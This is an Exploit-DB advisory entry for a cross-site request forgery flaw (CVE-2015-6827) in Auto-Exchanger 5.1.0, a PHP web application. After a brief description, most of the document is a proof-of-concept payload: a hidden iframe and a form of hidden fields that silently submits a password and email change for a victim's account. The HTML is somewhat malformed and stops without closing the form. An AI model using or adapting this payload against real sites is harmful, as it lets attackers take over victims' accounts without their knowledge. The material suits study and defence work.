Auto-Exchanger 5.1.0 - CSRF Vulnerability

ID EDB-ID:38119
Type exploitdb
Reporter Aryan Bayaninejad
Modified 2015-09-09T00:00:00


Auto-Exchanger 5.1.0 - CSRF Vulnerability. CVE-2015-6827. Webapps exploit for php platform

# Exploit Title: [Auto-exchanger version 5.1.0 Xsrf]
# Date: [2015/06/05]
# Exploit Author: [Aryan Bayaninejad]
# Linkedin : []
# Vendor Homepage: []
# Version: [Version 5.1.0]
# Demo :
# CVE : [CVE-2015-6827]


auto-exchanger version 5.1.0 suffers from an xsrf vulnerability , attacker
is able to abuse of this vulnerability to change password by a hidden
iframe in another page.




<iframe style="display:none" name="xsrf-frame"></iframe>
<form method='POST' action=''
target="xsrf-frame" id="xsrf-form">

<label id="lbl_error" name="lbl_error" class="ErrorMessage"></label>
<INPUT type="hidden" name="suser" value="victim_user">
<input type="hidden" name="section" value="do_update" />
<label type='hidden' id="n_password0"><span>
<input type='hidden' maxlength="20" size="30" name="password0"
id="password0"   value="testpassword123456" >  </label>
<input type="hidden" name="rid" value="" />
<label id="n_password">
<input type="hidden" maxlength="20" size="30" name="password1"
id="password1"   value="testpassword123456"   ></label>
<label id="n_mail">
<INPUT type='hidden' maxLength=60 size=30 name="mail" id="mail"
value="victim_email" type="text">
<label id="n_country">
<input type='hidden'  name="country" id="country"  style="width:196;"
<label id="cid">
<input type='hidden' name='cid' value='2'/>
<label id="n_curreny_account">
<INPUT type='hidden' maxLength=60 size=30 name="curreny_account"
id="curreny_account" value="" ><br>